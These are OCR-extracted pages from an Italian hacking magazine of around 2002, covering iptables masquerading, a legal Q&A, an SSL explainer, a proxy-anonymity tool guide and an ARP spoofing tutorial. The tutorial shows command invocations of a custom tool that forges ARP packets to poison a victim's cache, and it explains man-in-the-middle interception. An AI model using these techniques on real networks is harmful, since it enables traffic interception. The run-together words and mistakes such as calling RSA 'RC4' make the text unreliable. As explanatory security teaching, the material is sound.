iptables -t nat -A POSTROUTING-d ! 192.168.1.0/22 -j MASCHE-RADEiptables -t nat -A POSTROUTING-d ! 10.100.100.0/24 -j MASCHE-RADE

Questa regole viene aggiunta al-la catena postrouting (-A) dellatabella nat (-t). Con il punto esla-mativo si dice a iptables di ma-

scherare tutti i pac-chetti non diretti a192.168.1.0 porta22 e 10.100.100.0porta 24. Come im-postazione predefi-nita, iptables usa laprima scheda di re-te. Per modificarequesta scelta, si usa

l’opzione -o. Questa opzione pe-rò lascia la rete scoperta, perchèse un cracker vuole entrare nell’-host della rete interna, gli baste-rà digitare l’IP del firewall peravere una connessione diretta (lecose sono in realtà leggermentepiù complicate). Per evitare que-sto, applichiamo le regole di ma-scheramento solo alla rete inter-na:

iptables -A FORWARD -s192.168.1.0/24 -j ACCEPTiptables -A FORWARD -d192.168.1.0/24 -j ACCEPTiptables -A FORWARD -s10.100.100.0/24 -j ACCEPTiptables -A FORWARD -d10.100.100.0/24 -j ACCEPTiptables -A FORWARD -j DROP

Come dicevamo all’inizio, conquesti strumenti è anche possibileregistrare i pacchetti respinti, inmodo da avere un log da esami-nare, alla ricerca di tracce di unattacco o per risolvere problemisulla rete. Nei prossimi numerivedremo esattamente come fare.

:: AccE$$DeniEd ::http://accessdenied85.cjb.net K

>>


>> Mascheramneto in iptables

Mini firewall

Se il vostro scopo è protegere uncomputer direttamente connesso ainternet tramite un modem di casa(insomma se non è una rete azien-dale) potete costruirvi un sempli-cissimo firewall personale creandoun banalissimo script.Per esempio, per bloccare il pingsul vostro computer e registrare itentativi di ping su un log basteràcreare il seguente script:

#!bin/shecho “1” >>/proc/sys/net/ipv4/icmp_echo_ignore_allexit 0

(Per ulteriori informazioni riguar-do agli script leggetevi il mio tuto-rial all’indirizzo http://accessdenied85.cjb.net).

ip_masq_ftp Modulo per il mascheramento delle connessioni FTP

ip_masq_raudio Per il Real Audioip_masq_irc per IRCip_masq_vdolive Per le connessioni VDO Liveip_masq_cuseeme Per CU-See_Me

MODULO DESCRIZIONEMODULO DESCRIZIONE

Ho un lettore portatile di Mp3 con hard diskche mi ha cambiato la vita: posso finalmen-te portarmi a spasso gran parte della miacollezione musicale senza dover trasportareun armadio. Quasi tutti i file Mp3 che pos-seggo li ho estratti personalmente dai mieiCD, e quindi da quanto mi risulta il loropossesso e utilizzo sono perfettamente lega-li. Possiedo però anche svariati dischisu vinile. Il procedimento di acquisizione econversione in Mp3 sarebbe lungo, labo-rioso e porterebbe a risultati piuttosto sca-denti. Se io quindi scaricassi gli Mp3degli album di cui possiedo una copiain vinile e li conservassi per ascoltarli,commetterei comunque un reato?

Il comportamento non costituisce reato perdiversi motivi: 1) benché scaricato da Internet, il brano ècomunque una copia dell’originaledetenuto legittimamente, sebbene pro-veniente da un altro originale; 2) l’uso personale di opere musicalinon è previsto dalla legge come rea-to, essendo richiesto il fine di lucro (derivan-te, per esempio, dalla vendita);

3) in ogni caso è tuttora in vigore la legge 5febbraio 1992, n. 93, che prevede, all’art. 3,co. 1, che “gli autori e i produttori di fono-grammi, i produttori originari di opere audio-visive e i produttori di videogrammi, e loroaventi causa, hanno diritto di esigere, qualecompenso per la riproduzione privata per usopersonale e senza scopo di lucro di fono-grammi e di videogrammi, una quota sulprezzo di vendita al rivenditore dei na-stri o supporti analoghi di registrazioneaudio e video (musicassette, videocassette ealtri supporti) e degli apparecchi di registra-zione audio”.

Vi voglio porre un quesito, ho un portatile cheutilizzo sia sul lavoro che a casa. Ora, datoche è associato un indirizzo ip pubblico, rice-vo regolarmente dai 10-15 attacchi algiorno, sia su porte udp, che su http (è in-stallato un ftp server per scopi lavorativi).Spesso la maggioranza degli attacchi sonoda parte di server con il virus Nimda, che mistressano in continuazione, per fortuna ho zo-ne allarm che li blocca, ma quando diventatoinsistenti tipo 10-15 al di, allora eseguo untracert per vedere un pò meglio chi è. Poi, tra-mite languard, entro nel pc, cercando dicapire che ca**o vuole da me. Ormai mirendo conto quanto è infettato da nimda (tut-to il disco risulta essere condiviso). Quindi,entro nel suo disco, e sotto la cartella esecu-zione automatica, gli metto un file txt condentro l’avviso che il server è infettato,dopodiche gli mando in shutdown (sepossibile) il sistema.Facendo ciò mi tutelo dai suoi continui attac-chi, e tutelo anche il server che mi attacca. La domanda è: ma facendo cosi, commettoqualche reato o no?

..::BiT::..

Legge

A volte non è semplice tirare la linea che separe un

comportamento legittimo da un reato.

Ecco le risposte di TuonoBlu ai vostri dubbi legali

LO SPORTELLO LEGALE DI HACKER JOURNAL

>> Abuso di legittima difesa?

>> Mp3 legittimi?

Indipendentemente dalla malvagità del com-portamento (che non rileva ai fini della perpe-trazione del reato) il lettore si sta rendendo re-sponsabile di accesso abusivo ad un sistemainformatico, condotta prevista e punita dal-l’art. 615 ter del Codice Penale.Il comportamento corretto da tenere in questicasi è quello di limitarsi a individuare l’elabo-ratore da cui parte l’assalto (senza neppuretentare di accedervi, visto che anche tale con-dotta è punibile) e comunicare al titolare (o al-le Forze dell’Ordine, se quest’ultimo non è rin-tracciabile) tutte le informazioni del caso.

Ho visto molte volte siti pirata chiusi perchècontenenti materiale illegale. Ma la “giusti-zia” si limita a chiuderlo oppure si han-no anche dei problemi in futuro (fedinapenale, processi, eccetera)?

Neo

Ogni sequestro penale è preceduto o seguito(a seconda del tipo di provvedimento adotta-to dall’autorità giudiziaria) un procedimen-to penale, che può concludersi, ovvia-mente, con l’assoluzione o la condan-na. Il discorso è diverso in caso di provvedi-mento cautelare ex art. 700 c.p.c. Questoprovvedimento si applica in processi civili, chepotrebbero anche non iniziare se le parti (l’at-taccante e il danneggiato) trovano un accor-do, anche al di fuori del processo. K

>> Conseguenze dei sequestri

Chi è TuonoBlu?È abbastanza chiaro che dietro alnick TuonoBlu si cela un avvocato,ma qual è il suo vero nome? Vedia-mo come ve la cavate con le investi-gazioni in Rete: provate a scopriredi chi si tratta, e scriveteci la rispo-sta a [email protected]. I primi tre a dare la risposta corret-ta riceveranno in omaggio una co-pia di un suo libro relativo a hac-king e criminalità (il titolo non ve lodiciamo, sennò è troppo facile...).


Si può fare o no?“Evitiamo di finire

nei guai!”

bbiamo già parlato si SSL,con Onda Quadra nel nume-ro 2, e l'argomento ha susci-tato un grande interesse. Ve-diamo quindi di spulciare trale pieghe di Secure Socket La-yer per comprenderne il fun-

zionamento nei minimi dettagli. Il protocol-lo SSL (Secure Socket Layer) è un prodot-to di Netscape, ma è supportato anche daaltri browser. Questo protocollo garantiscela privacy delle comunicazioni su internet epermette di far comunicare un client con unserver in modo sicuro e privato, e infattiquesto protocollo è molto utilizzato per con-nessioni dove c'è bisogno di inviare infor-mazioni riservate, come per esempio il nu-mero di carta di credito o nomi utene e pas-sword per l’accesso a siti e servizi protetti.

Sono molti gli aspetti che rendono sicu-ro e affidabile questo protocollo, e vale lapena di esaminarli in dettaglio.

Il sistema di cifratura parte da dopo lohandshake fino alla fine della connessionepoiché anche i dati inviati vengono critto-

grafati e per questo viene utilizzata la critto-grafia simmetrica (DES e RC4)

DES: è l'acronimo di Digital EncryptionStandard, un algoritmo di criptazione cheusa chiavi a 64bit, non ha un elevata po-tenza di calcolo in confronto alle attuali.Ciononostante, questo algoritmo è moltousato, spesso nella sua variante Triple-DES,basata sull'uso di DES ripetuto per tre volte.

Con questo standard il testo in chiaro ininput e il testo cifrato in uscita hanno unalunghezza standard di 8 byte. L'input devequindi essere un multiplo di questo bloccoelementare; se la lunghezza del messaggionon corrisponde a un multiplo di questagrandezza, deve essere imbottito di dati, fi-no ad arrivare alla misura necessaria peroperare in modo CBC o ECB correttamen-te.

La chiave di cifratura è formata da 56bit casuali e 8 bit pari, che vanno a com-porre una chiave a 64 bit.

3DES: Questo metodo è figlio del pre-cedente e consiste nell'esecuzione del DESper tre volte consecutive, per triplicare il nu-mero di bit nella chiave di cifratura . Sonomolti i sistemi che supportano questo meto-do. Questa tecnica è conosciuta come EDE

(Encrypt-Decrypt-Encrypt); il processo didecodifica può essere reso compatibile conil precedente, fermando il meccanismo ametà.

Se le tre chiavi usate sono le stesse, il Tri-ple DES è equivalente a un singola cifraturaDES; con questo metodo un’applicazioneche può usare solo il DES, è in grado di co-municare con un'altra che sta usando il Tri-ple DES. Se invece le tre chiavi sono diffe-renti, la decrittazione mezzo disturberà ilmessaggio opposto ed esso non decifrerà ilprimo stadio.

RC4: un algoritmo della RSA Data Se-curity, Inc. Originariamente le specificheprogettuali dellíRC4 erano segrete, ma nel1994 sono state divulgate.

Questo algoritmo è molto utilizzato invari tipi di applicazioni. L'RC4 usa la chia-ve fornita dagli utilizzatori per produrreuna sequenza numerica pseudo-casuale;essa è legata al vettore XOR con i dati diinput.

Questo significa che le operazioni dicrittazione e di decrittazione sono identi-che. Il numero di bit della chiave è varia-bile: va da un minimo di 8 ad un massimodi 2048. Il codice usato da questo sistemaha una lunghezza dieci volte inferiore ri-spetto al DES (minore sicurezza), ma ilvantaggio sta nella velocità di esecuzione(circa 5 volte più veloce). Non ci sono at-tacchi conosciuti nei suoi confronti. La ver-sione internazionale dell’RC4 a 40 bit èstata violata con il metodo a forza bruta in8 giorni da ben due associazioni.

Questo processo viene attuato utiliz-zando sistemi di cifratura asimmetrica o

sicurezza

COME FUNZIONANO LE CONNESSIONI CIFRATE PER WEB, TELNET E FTP

A

I segreti di SSLTorniamo ad esaminare Secure Socket Layer uno dei protocolli di cifratura

più diffusi per il Web e le connessioni Telnet.


>> Privacy

>> Autenticazione

a chiave pubblica come RSA e DSS. Inquesto modo si è sicuri di comunicare di-rettamente con il server giusto (l'autenti-cazione è richiesta sia dal server che dalclient).

RC4: è l'acronimo di Rivest ShamirAdelman questo algoritmo è consideratomolto sicuro se si usano chiavi lunghe co-me da 768 bit o 1024, questo algoritmoa chiave pubblica è il più usato sia per ci-frare che per le firme digitali. Il suo fun-zionamento è simile a questo

1. A genera due numeri primi grandi p e q ; 2. A calcola n = p ◊ q e f(n) = (p - 1)(q - 1) ; 3. A sceglie un numero 1 < e < f(n) tale chegcd(e, f(n)) = 1; 4. A calcola d = e-1 mod f(n) usando líalgo-ritmo di Euclide Esteso; 5. A pubblica n ed e come sua chiave pub-blica PA = (e, n). 6. A conserva n e d come sua chiave privataSA = (d, n).

DSS: è l'acronimo di Digital Signa-ture Standard non è molto affidabile eutilizzato solo per la firma e non è statoancorareso del tutto pubblico.

SSL è multipiattaforma, e lavora suWin come su Solaris.

In passato il governo americano im-poneva pesanti limitazioni all’utilizzodelle tecniche di crittografia “forti”, percui non si potevano impiegare chiavipiù lunghe di 40 bit.

Oggi queste limitazioni sono cadu-te, ed è finalmente possibile scaricare eutilizzare legittmamente browser chesupportano le chiavi lunghe.

Handshake e analisi dei processiInanzitutto i protocolli usati durante la

sequenza di handshakesono:

"SSL Handshake Protocol" per stabilireuna sessione tra il client ed il server

"SSL Change Cipher Spec protocol" perconcordare la Cipher Suite per la ses-sione.

>>


"SSL Alert Protocol" per comunicare i mes-saggi di errore SSL tra client e server. Vediamo come funziona una connessione(client -> server) con SSL

Nella prima parte il client e il serverconcordano sulla versione delprotocollo esugli algoritmi di crittografia da usare, epoi usano la cifratura a chiave pubblicaper scambiarsi i dati crittati.

Vediamo il tutto più in dettaglio: ilclient spedisce al server un hello e que-st'ultimo risponde allo stesso modo (conun server hello), questo ha un valore im-portante infatti durante questa fase ven-gono stabiliti:protocol version, cipher suite, session ID ecompression method

Se durante questa fase qualcosa falli-sce o va storto, la connessione viene inter-rotta... a questo punto il server manda unmessaggio di server hello done questoper indicare al client che la fase hellomessage dell'handshake è terminata consuccesso e attende una risposta positivadal client.

A questo punto si scambieranno i datidi cui abbiamo parlato sopra.

La fase di handshake è finita, e duran-te la connessione il server può mandaresvariati hello request anche se questi ver-ranno ignorati dal client.

Al contrario, il client può mandarea sua volta dei client hello per rinego-ziare i dati di una connessione pre-esi-stente. Un completo esempio di hands-hake è questo:

Client ------> ClientHello ------> ServerClient <------ ServerHello <------ Server

Client <------ Certificate <------ Server

>> Multipiattaforma

Client <------ Certificate request <------ServerClient <------ ServerHelloDone <------Server

Client ------> Certificate ------> ServerClient ------> Certificate verify ------> ServerClient ------> ChangeChiperspec ------>ServerClient ------> Finished ------> Server

Client <------ ChangeChiperspec <------ServerClient <------ Finished <------ Server

Il client hello ha una struttura comequesta:

struct { ProtocolVersion client_version; Random random; SessionID session_id; CipherSuite cipher_suites<2..215>; Compression Method compression _me-thods<1..27>; } ClientHello;

mentre il server hello ha una struttura co-me questa:

struct { ProtocolVersion server_version; Random random;SessionID session_id; CipherSuite cipher_suite; CompressionMethod compression_me-thod; } ServerHello;

server_version: contiene la versionedel protocollo

Random: è una struttura completa-mente casuale generata dal server chenon ha nessuna dipendenza dal messag-gio hello dato dal client

Compression_method: il metodo dicompressione dato dal server

Una chiper suite è definita da tre com-ponenti:- Metodo di scambio della chiave - Algoritmo di cifratura per il trasferimen-to dei dati

L'uso di RC4 con chiavi di 40 bit sem-brerebbe una cosa poco sicura e in effettiè così.

Qua in italia è d'obbligo per la leggedegli USA sull'esportazione degli algorit-mi di crittazione.

Molti altri bachi sono stati scoperti suquesto protocollo. Come al solito, bug-traq è un ottimo strumento per tenersi ag-giornati.

Prima di lasciarvi volevo dire due ulti-me cose molto importanti.

1. Il protocollo SSL non è un protocollo in-dipendente ma si appoggia ad un altroprotocollo, il TCP/IP.

2. SSL è applicato in molti servizi usatiovunque e molto spesso come telnet e ftp:

SSL-telnet:ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps/

SSL-ftp:ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps/

K

www.eviltime.com

sicurezza


COME FUNZIONANO LE CONNESSIONI CIFRATE PER WEB, TELNET E FTP

- Message Digest per la creazione delMAC (Message Autentication Code)

1. Metodo di scambio della chiave:Il metodo di scambio della chiave serveper definire come verrà concordata inseguito la chiave segreta. SSL 2.0 sup-porta solo lo scambio di chavi RSA,mentre la versione successiva SSL 3.0supporta vari algoritmi di scambio.

2. Algoritmo di cifratura per il tra-sferimento dei dati

Per la cifratura dei dati,SSL usa algoritmi di crittogra-fia simmetrica. Si possono ef-fettuare ben otto scelte:

Cifratura Blocchi.RC4 con chiave di 40-bit .RC4 con chiave di 128-bit

CBC Cifratura Blocchi.RC2 con chiave di 40-bit .DES40, DES, 3DES_EDE. .Idea .Fortezza

Eventualmente, è anche possibile noneseguire alcuna cifratura.

3. Message Digest per la creazione delMAC

Questo determina come verrà creatal'impronta digitale dal record.

Le scelte sono tre:

MD5, con hash a 128-bit SHA (Secure Hash Algorithm) con hash a160-bit

o anche qui, si può evitare di sceglierealcuna impronta.

Server certificate: per una maggioresicurezza, durante l'handshake il serverinvia il cosiddetto "server certificate" ovve-ro il certificato che viene inviato subito do-po il server hello.

Se il server non dispone di un certifica-to, allora manda un messaggio di serverkey exchange. Il server potrebbe anchechiedere un "certificate request", ovvero un

certificato dal client (anche se questo nonsuccede molto spesso).

Client certificate: Il client dopo averericevuto un server hello done manda ilsuo certificato.

Secret Premaster message (RSA): Ilclient genera un messaggio premaster di48 byte usando l'algoritmo a chiave pub-blica del server che ha una struttura comequesto:

struct {ProtocolVersion client_version; opaque random[46]; } PreMasterSecret;

Client_version e random sono cose già vi-ste prima

Pre_Master_Secret : è il valore gene-rato a random dal client usato per gene-rare il master secret vero e proprio

struct { public-key-encrypted PreMasterSecretpre_master_secret; } EncryptedPreMasterSecret;

In teoria, la risposta dovrebbe essereSI, ma la pratica è cosa ben diversa infat-ti SSL riporta varie falle e può essere "fa-cilmente" (si fa per dire) violabile con me-todi come:CrittanalisiForza brutaReplay

>> SSL=sicurezza?

All�indirizzo www.openssl.org si trovano le specifi-che e i sorgenti di OpenSSL, un�implementazioneOpen Source di SSL.

pratica

i sa che ogni voltache si visita un sito,questo potrà ottene-

re su di noi tutta unaserie di informazioni, a partire dall'indi-rizzo IP (dal quale si può risalire a gran-di linee alla posizione geografica), finoall'indirizzo di provenienza, il sistemaoperativo e il browser utilizzati. Uno dei metodi più usati per nasconde-re le proprie tracce è l'utilizzo di un ser-ver proxy, un computer intermedio tranoi e il destinatario della connessione.Invece di vedere le nostre "impronte di-gitali" (nel senso più moderno della pa-rola), il sito visitato vedrà l'indirizzo e leinformazioni relative al Proxy.I proxy possono essere utilizzatida un'interfaccia Web (come quelladi anonymizer.com) o modificando leimpostazioni di rete (o quelle delbrowser). Il problema nell'ultimo caso èche molto spesso i proxy server nasconoe muoiono nello spazio di pochi giorni,oppure in certi momenti sono così affol-lati da essere quasi inutilizzabili, e quin-di bisogna modificare spesso cercarneuno che funzioni e modificare le impo-stazioni. Insomma, dopo un po' la cosa potrebbediventare scocciante. Se non avete esi-genze da 007, potrebbe essere moltoutile l'utility MultiProxy, che mantieneuna lista di proxy che vengono control-lati per verificarne l'affidabilità e la ve-locità ogni volta che si avvia il pro-gramma. Provvederà lui a ordinarli pervelocità, eliminare quelli non attivi (onon sicuri) e a selezionare di volta involta il migliore.

Come al solito, la prima cosada fare è scaricare il program-ma dall'indirizzo www.multi-proxy.org, e installarlo sul pro-

prio computer con un doppio clic sul file.exe che si ottiene dopo aver scompatta-to ll'archivio .zip scaricato.

S

COME USARE IL PROGRAMMA MULTIPROXY

>>

Siete stufi di dover spippolare ogni volta

le impostazioni dei proxy per potersi

garantire un po' di sano anonimato in rete? Ecco il programma che fa per voi!

Come seconda cosa, bisogneràprocurarsi una lista di proxy ag-giornata. Quella presente sul sitoè stata modificata l'ultima volta in

maggio; per qualcosa di più recente, poteteprovare su www.atomintersoft.com/products/alive-proxy/proxy-list/,avendo cura di scegliere soli proxy anonimi.

Aprite il Blocco Note e Create unfile di testo che contenga gli indi-rizzi dei proxy, uno per riga. Do-po aver aperto MultiProxy con un

doppio clic sulla sua icona, fate clic su Op-tions, poi sulla linguetta Proxy servers list. Fa-te clic con il tasto destro del mouse e sele-zionate il comando Import Proxy List dal me-nu Files, selezionando il file che avete appe-na creato.

Chiudete per ora la finestra Op-tions, e dalla finestra premete ilpulsante Check all proxies: ve-drete partire un contatore sulla

sinistra, che mostra lo stato di avanzamentodella verifica delle condizioni dei vari server.Attendete che arrivi alla fine. Nella finestraProxy Servers list dovrebbe ora comparire lalista dei proxy, con un pallino verde su quel-li attivi e uno rosso su quelli inattivi.

Aprite ora il browser e, nelle im-postazioni del proxy http, inseritel'indirizzo 127.0.0.1 porta 8088.Con Internet Explorer 6, selezio-

nate Opzioni Internet dal menu Strumenti,fate clic sulla linguetta Connessioni. Se vicollegate a Internet con una Lan, potete in-serire le impostazioni del proxy direttamentenella finestra Connessioni, altrimenti sele-zionate la connessione di Accesso Remotodesiderata, premete il pulsante Impostazio-ni, spuntate la casella Utilizza un serverproxy e inserite l'indirizzo come sopra.

A questo punto, ogni volta che richiede-rete un indirizzo Internet dal vostro bro-wer, questo non lo contatterà direttamen-te, ma farà una richiesta a MultiProxy,che vi collegherà al più veloce proxy del-la sua lista, permettendovi una naviga-zione finalmente riservata. K

1

3

2

5

27| www.hackerjournal.it

Navigare anonimi con il minimo sforzo

4

Networking

Cerchiamo di comprendere come è possibile portare attacchi direttamente al

meccanismo di smistamento dei pacchetti di una LAN

Spoofing dei pacchetti ARP

ual è la più grande vulnerabilità di una LAN? Pro-babilmente è il fatto che sia possibile falsificarepacchetti ARP. Grazie a questo, si può far credereche delle macchine appartengano a una certa rete,mentre questo non è vero, ridirezionando TUTTO iltraffico Ethernet. Come può essere sfruttata questavulnerabilità? In molti casi un attaccante la userà

per monitorare il traffico di rete. Oppure potrebbe utilizzarlaper un attacco Denial of Service o per interporsi in una co-municazione, intercettandola (attacco “man in the middle”).

L’ARP è l’Address Resolution Protocol e serve a mappare gli in-dirizzi IP a indirizzi ethernet (MAC). Quando viene trasmessoun pacchetto IP in una rete, il sistema deve sapere a qualemacchina fisicamente attaccata alla LAN deve mandare que-sto pacchetto (se al router o un altro host nella rete). Quindi“chiede” alla LAN chi ha l’IP x.x.x.x e qualcuno risponderàx.x.x.x si trova alla scheda di rete che ha indirizzo MACxx:xx:xx:xx:xx:xx. In questo modo si può completare l’headerdatalink (802.3) e il pacchetto può essere inviato. Questo me-todo è simile al DNS, che serve per associare il numero IP aun certo indirizzo del tipo nomehost.nomedominio.it. Se vo-glio mandare un pacchetto a nasa.gov, io “chiedo” (in questocaso al NS auth di nasa.gov) l’ip che corrisponde a nasa.gov.Posso quindi completare il header IP e mandare il pacchetto.Ci sono 2 tipi di pacchetti arp: arp request e arp reply. Illu-striamo il concetto con tcpdump:

192.168.1.2 vuole mandare un icmp echo a192.168.1.154:

# ping -c 1 192.168.1.154PING 192.168.1.154 (192.168.1.154): 56 octets data64 octets from 192.168.1.154: icmp_seq=0 ttl=255 ti-me=3.0 ms

tcpdump:15:19:26.217004 0:10:a4:c0:15:92 ff:ff:ff:ff:ff:ff 0806 42:arp who-has 192.168.1.154 tell 192.168.1.215:19:26.217563 0:80:c8:7a:39:14 0:10:a4:c0:15:920806 64: arp reply 192.168.1.154 is-at 0:80:c8:7a:39:1415:19:26.217608 0:10:a4:c0:15:92 0:80:c8:7a:39:140800 98: 192.168.1.2 > 192.168.1.154: icmp: echo re-quest (DF)15:19:26.218351 0:80:c8:7a:39:14 0:10:a4:c0:15:920800 102: 192.168.1.154 > 192.168.1.2: icmp: echoreply

Il primo pacchetto è “dite a 192.168.1.2 il mac di192.168.1.154”. Ovviamente è un pacchetto broadcast(ff:ff:ff:ff:ff:ff) perché sta “cercando” l’host.L’host risponde con un pacchetto unicast dicendo “192.168.1.154si trova all’ indirizzo 0:80:c8:7a:39:14”A questo punto può essere mandato il pacchetto ICMP. Proprio co-me succede con il DNS, se uno esegue telnet nasa.gov. Prima ilpacchetto UDP alla 53 e poi il syn alla 23. Se ora viene manda-to un altro ICMP a 192.168.1.154 noterete che NON ci saràun’altra richiesta ARP. Gli ARP, come gli host dei NS, vengono me-morizzati in cache:

root:~# arp -na(192.168.1.154) at 00:80:C8:7A:39:14 [ether] on eth0

root:~#

Ogni tanto i dati in cache “scadono”, e quindi bisogna mandare unaltra richiesta. La cache naturalmente serve a non sovraccaricare larete di pacchetti ARP.

Ecco come viene costruito un pacchetto ARP; il codice è preso da/usr/include/linux/if_arp.h:

struct arphdr{unsigned short ar_hrd; /* format of hardware address */unsigned short ar_pro; /* format of protocol address */unsigned char ar_hln; /* length of hardware address */

Q>> Cos’e l’ARP?

COME DIROTTARE PACCHETTI DENTRO A UNA RETE LOCALE


>> Come sono formati i pacchetti ARP

28_31ARP_spoofing 21-08-2002 17:30 Pagina 28

unsigned char ar_pln; /* length of protocol address */unsigned short ar_op; /* ARP opcode (command) */

#if 0/*

*Ethernet looks like this : This bit is variable sizedhowever...*/unsigned char ar_sha[ETH_ALEN]; /* sender hardwareaddress */unsigned char ar_sip[4]; /* sender IP address*/unsigned char ar_tha[ETH_ALEN]; /* target hardwareaddress */unsigned char ar_tip[4]; /* target IP address*/#endif

};

Format e length non ci interessano (arp NON è solo per as-sociare indirizzi ethernet e IP: è un protocollo generico, an-che se qui parleremo solo di IP). Ar_op è ARP request o reply.

“Sender hardware address e IP” (indirizzoMAC di chi invia la richiesta e IP corri-

spondente), e “target hardware e ip”sono le parti più interessanti del pac-chetto. Sender hardware e Sender IPrestano sempre l’IP e il MAC di co-lui che manda il pacchetto. Seinvece il pacchetto è request,target hardware viene riem-pito con lo 0 (perché nonsi conosce) e target ipè l’ip di cui voglia-mo sapere l’-hardware ad-dress. Nel

reply viene semplicemente riempito il target hardware, modi-ficato l’opcode e rimandato indietro. Il sistema operativo sa dove mandare i pacchetti grazie appuntoalla tabella ARP (la cache). Quest’ultima viene aggiornata e cam-biata dai pacchetti ARP. Iniziamo a mandare un po’ di pacchettifinti e vediamo cosa succede... in teoria quando viene inviata unARP request, se io mando un reply con il MIO mac address, il si-stema pensa di collegarsi ad X ma in realtà si collega a me. Di-ciamo in parole semplici che se io mando un NS reply che affer-ma che l’indirizzo di nasa.gov è 192.168.1.2, l’host pensa che sicollega a nasa.gov ma in realtà si collega a 192.168.1.2 ;).Vediamo un semplice esempio:

192.168.1.154 (la vittima) vuole collegarsi a 192.168.1.2(che in realtà non esiste).

root@DigitalF:~# ping -c 1 192.168.1.2PING 192.168.1.2 (192.168.1.2): 56 octets data

non torna nulla perché non riceve ARP reply

29:36:41.323528 0:80:c8:7a:39:14 ff:ff:ff:ff:ff:ff 0806 64:arp who-has 192.168.1.2 tell 192.168.1.154 (senzareply)

infatti:

root@DigitalF:~# arp -na(192.168.1.2) at <incomplete> on eth0(192.168.1.1) at 00:10:A4:C0:15:92 [ether] on eth0

root@DigitalF:~#

proviamo invece a mandare un finto reply da 192.168.1.1(che ha mac 00:10:A4:C0:15:92):

# ./arp <dev> <srcmac> <dstmac> <arp op:1req2 rep> <srcmac> <srcip> <dstmac> <dstip> <de-

lay>

quindi...

# ./arp eth0 aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 200:10:A4:C0:15:92 192.168.1.2 aa:bb:bb:bb:bb:bb192.168.1.30 10000000DELAY = 10000000SENT#

root@DigitalF:~# arp -na? (192.168.1.2) at 00:10:A4:C0:15:92 [ether] on eth0? (192.168.1.1) at 00:10:A4:C0:15:92 [ether] on eth0root@DigitalF:~#

Ora 192.168.1.154 (DigitalF per capirci...) crede che192.168.1.2 sia 00:10:A4:C0:15:92

ora proviamo a trasmettere...

root@DigitalF:~# ping -c 1 192.168.1.2PING 192.168.1.2 (192.168.1.2): 56 octets data

>> ARP Reply


>>


Networking

COME DIROTTARE PACCHETTI DENTRO A UNA RETE LOCALE


—- 192.168.1.2 ping statistics —-1 packets transmitted, 0 packets received, 100% packetlossroot@DigitalF:~#

tcpdump:20:08:02.816143 0:80:c8:7a:39:14 0:10:a4:c0:15:920800 102: 192.168.1.154 > 192.168.1.2: icmp: echo re-quest

Come volevasi dimostrare: in poche parole, abbiamo spoofato192.168.1.2 (che non esisteva all’inizio), non c’è reply perché ilsistema operativo sa solo di essere .1 e non .2 Quindi il MAC ènostro e il dst IP è rimasto identico. Se guardate bene, si notanodei valori strani nella riga di comando...source macaa:aa:aa:aa:aa:aa non combacia con 00:10:A4:C0:15:92; questo avviene perché il kernel non effettuauna verifica. Questo è soltato uno degli esempi possibili ma un at-tacker potrebbe fare molto altro falsificando i reply. Per fare unbreve riassunto, diciamo che con gli ARP reply è possibile modifi-care la cache ARP, e inviare pacchetti broadcast senza che il tar-get ip venga controllato.A cosa ci serve mandare un ARP request?

# ./arp eth0 aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 100:10:40:30:20:11 192.168.1.2 00:00:00:00:00:00192.168.1.8 10000000DELAY = 10000000SENT#

ora vediamo la cache di DigitalF...

root@DigitalF:~# arp -na(192.168.1.2) at 00:10:40:30:20:11 [ether] on eth0(192.168.1.1) at 00:10:A4:C0:15:92 [ether] on eth0

root@DigitalF:~#

Abbiamo nuovamente cambiato la cache per 192.168.1.2.Ma perché? guardiamo il protocollo... Gli arp request con-tengono il source ip e source mac di un host e il dst ip a cuiviene inviata la richiesta. Perché non memorizzare in cache ilsource e dest mac dei request che riceviamo? Questo permet-terà di evitare di mandare un request per quel IP nel futuro.Infatti, questa procedura fa parte del protocollo. Un attackerpotrebbe inserire informazioni false per memorizzare in cacheciò che più gli pare. Si noti come anche in questo caso il dstip non viene controllato, e il pacchetto è broadcast.

Proviamo a mandare un request con un source ip che non stagià nella table (quindi effetivamente cerchiamo di creare unentry nell’arp table).

# ./arp eth0 aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 100:10:40:30:20:11 192.168.1.4 00:00:00:00:00:00

192.168.1.8 10000000DELAY = 10000000SENT#root@DigitalF:~# arp -na(192.168.1.1) at 00:10:A4:C0:15:92 [ether] on eth0

root@DigitalF:~#

Non succede nulla. Se però si prova con il vero dst ip di Di-gitalF (.154)

# ./arp eth0 aa:aa:aa:aa:aa:aa ff:ff:ff:ff:ff:ff 100:10:40:30:20:11 192.168.1.4 00:00:00:00:00:00192.168.1.154 10000000DELAY = 10000000SENT#root@DigitalF:~# arp -na(192.168.1.4) at 00:10:40:30:20:11 [ether] on eth0(192.168.1.1) at 00:10:A4:C0:15:92 [ether] on eth0

root@DigitalF:~#

Et voila! La voce è stata creata. Si noti che con arp reply nonfunziona mettendo il vero dst ip. Con dst ip 127.0.0.1,214.0.0.1 eccetera invece non funziona. Quindi il kernel controlla effettivamente il dst ip per creare unaentry nel table, e non si può broadcastare. Al contrario, si possono benissimo broadcastare pacchetti cheaggiornano la cache e creare entry in essa (quest’ultimo devecontenere il dst ip corretto, quindi non possiamo broadcastarequando creiamo entry). Per broadcast intendo che con un pac-chetto un attacker può passare indisturbato.Modificando la tabella di ARP un attaccante potrebbe ridirige-re tutto il traffico della rete sulla propria macchina, catturarlo,e poi inviarlo eventualmente alla vera destinazione. Supponiamo di avere due computer di una LAN, A e B, chehanno in cache il MAC address del router. Se questo viene mo-dificato, inserendo abusivamente il MAC address del computerC al suo posto, tutto il traffico destinato al router (tutto il traf-fico Internet in pratica) verrà dirottato su C. Che potrà a sua volta dirigerlo sul router o fare esso stesso darouter, avendo però la possibilità di intercettare le comunica-zioni e alterare ogni pacchetto.

>> ARP Request

>> Possibili attacchi

Per saperne di più

UUUUlteriori informa-zioni tecniche sull’Address ResolutionProtocol possono essere trovate nelle RFC

826 e 903, che si possono trovare un po’ ovun-que su Internet, per esempio suwww.faqs.org/rfcs/rfc826.html ewww.faqs.org/rfcs/rfc903.html rispettivamente. Purtroppo non sono state ancora tradotte in ita-liano.



Traffico normale

Traffico dopo aver modificato la cache di ARP impo-stando il MAC Address di C sull’IP del router.

in pratica:

